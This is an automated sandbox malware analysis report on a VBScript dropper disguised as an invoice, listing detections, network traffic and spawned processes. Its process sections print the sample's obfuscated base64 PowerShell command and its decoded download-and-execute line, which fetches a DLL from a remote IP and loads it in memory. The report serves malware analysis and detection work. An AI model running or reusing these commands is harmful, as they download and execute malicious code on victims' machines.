Windows Analysis Report
Ref. No INV088002904SINO.vbs

Overview

General Information

Sample Name: Ref. No INV088002904SINO.vbs
Analysis ID: 699422
MD5: 78f2e521d65cd356494edd52bfa2eb94
SHA1: abd02c0ece3445944708037fcfeffa0f69c14319
SHA256: e844196a40b506f2d00760b7dfcb2474c56f30c705d078cb265b8871aeca8e79
Tags: vbs
Infos:

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Obfuscated command line found
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
HTTP GET or POST without a user agent
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

AV Detection

barindex
Source: Ref. No INV088002904SINO.vbs ReversingLabs: Detection: 26%
Source: Ref. No INV088002904SINO.vbs Virustotal: Detection: 13% Perma Link
Source: Ref. No INV088002904SINO.vbs Metadefender: Detection: 20% Perma Link
Source: http://20.7.14.99 Avira URL Cloud: Label: malware
Source: http://20.7.14.99/server/dll.txt Avira URL Cloud: Label: malware
Source: http://20.7.14.99 Virustotal: Detection: 22% Perma Link
Source: http://20.7.14.99/server/dll.txt Virustotal: Detection: 26% Perma Link
Source: Binary string: dbpdbtem.pdbf source: powershell.exe, 00000003.00000002.343505477.000001B0AB05A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000003.315311073.000001B0AAD51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 70n.pdbM source: powershell.exe, 00000003.00000002.343179058.000001B0AAD2E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 90n.pdb source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.343179058.000001B0AAD2E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Core.pdb/ source: powershell.exe, 00000003.00000002.343505477.000001B0AB05A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 90n.pdbM source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb6 source: powershell.exe, 00000003.00000002.343621942.000001B0AB093000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.343330923.000001B0AAD3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000003.315447170.000001B0AB0F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.344023748.000001B0AB104000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *.pdbKj source: powershell.exe, 00000003.00000002.342878874.000001B0AACF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.343330923.000001B0AAD3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000003.00000003.315282709.000001B0AAD3F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb.pdb source: powershell.exe, 00000003.00000003.315311073.000001B0AAD51000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: global traffic HTTP traffic detected: GET /server/dll.txt HTTP/1.1Host: 20.7.14.99Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 20.7.14.99 20.7.14.99
Source: unknown TCP traffic detected without corresponding DNS query: 20.7.14.99
Source: unknown TCP traffic detected without corresponding DNS query: 20.7.14.99
Source: unknown TCP traffic detected without corresponding DNS query: 20.7.14.99
Source: unknown TCP traffic detected without corresponding DNS query: 20.7.14.99
Source: unknown TCP traffic detected without corresponding DNS query: 20.7.14.99
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Sep 2022 05:31:10 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Content-Length: 297Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 37 2e 34 2e 32 39 20 53 65 72 76 65 72 20 61 74 20 32 30 2e 37 2e 31 34 2e 39 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 Server at 20.7.14.99 Port 80</address></body></html>
Source: powershell.exe, 00000003.00000002.339339189.000001B09412F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.325801923.000001B093624000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.7.14.99
Source: powershell.exe, 00000003.00000002.319852310.000001B090AB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.7.14.99/server/dll.txt
Source: powershell.exe, 00000001.00000002.355628594.00000216B8620000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.312074067.000001B0AB093000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.343700815.000001B0AB0A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.340730750.000001B0A2A6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.321573407.000001B092C24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.350622137.00000216A0541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.320814767.000001B092A11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.321573407.000001B092C24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.321573407.000001B092C24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.340730750.000001B0A2A6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: global traffic HTTP traffic detected: GET /server/dll.txt HTTP/1.1Host: 20.7.14.99Connection: Keep-Alive

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 5976, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4764, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe Jump to behavior
Source: Process Memory Space: powershell.exe PID: 5976, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4764, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Ref. No INV088002904SINO.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF816391D70 3_2_00007FF816391D70
Source: Ref. No INV088002904SINO.vbs ReversingLabs: Detection: 26%
Source: Ref. No INV088002904SINO.vbs Virustotal: Detection: 13%
Source: Ref. No INV088002904SINO.vbs Metadefender: Detection: 20%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Ref. No INV088002904SINO.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth')) Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Ref. No INV088002904SINO.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tigd1obk.kyu.ps1 Jump to behavior
Source: classification engine Classification label: mal92.evad.winVBS@6/5@0/1
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: dbpdbtem.pdbf source: powershell.exe, 00000003.00000002.343505477.000001B0AB05A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000003.315311073.000001B0AAD51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 70n.pdbM source: powershell.exe, 00000003.00000002.343179058.000001B0AAD2E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 90n.pdb source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.343179058.000001B0AAD2E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Core.pdb/ source: powershell.exe, 00000003.00000002.343505477.000001B0AB05A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 90n.pdbM source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb6 source: powershell.exe, 00000003.00000002.343621942.000001B0AB093000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.343330923.000001B0AAD3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000003.315447170.000001B0AB0F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.344023748.000001B0AB104000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *.pdbKj source: powershell.exe, 00000003.00000002.342878874.000001B0AACF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000003.00000003.315421009.000001B0AAD2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.343330923.000001B0AAD3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000003.00000003.315282709.000001B0AAD3F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb.pdb source: powershell.exe, 00000003.00000003.315311073.000001B0AAD51000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8", "0", "false");
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth')) Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
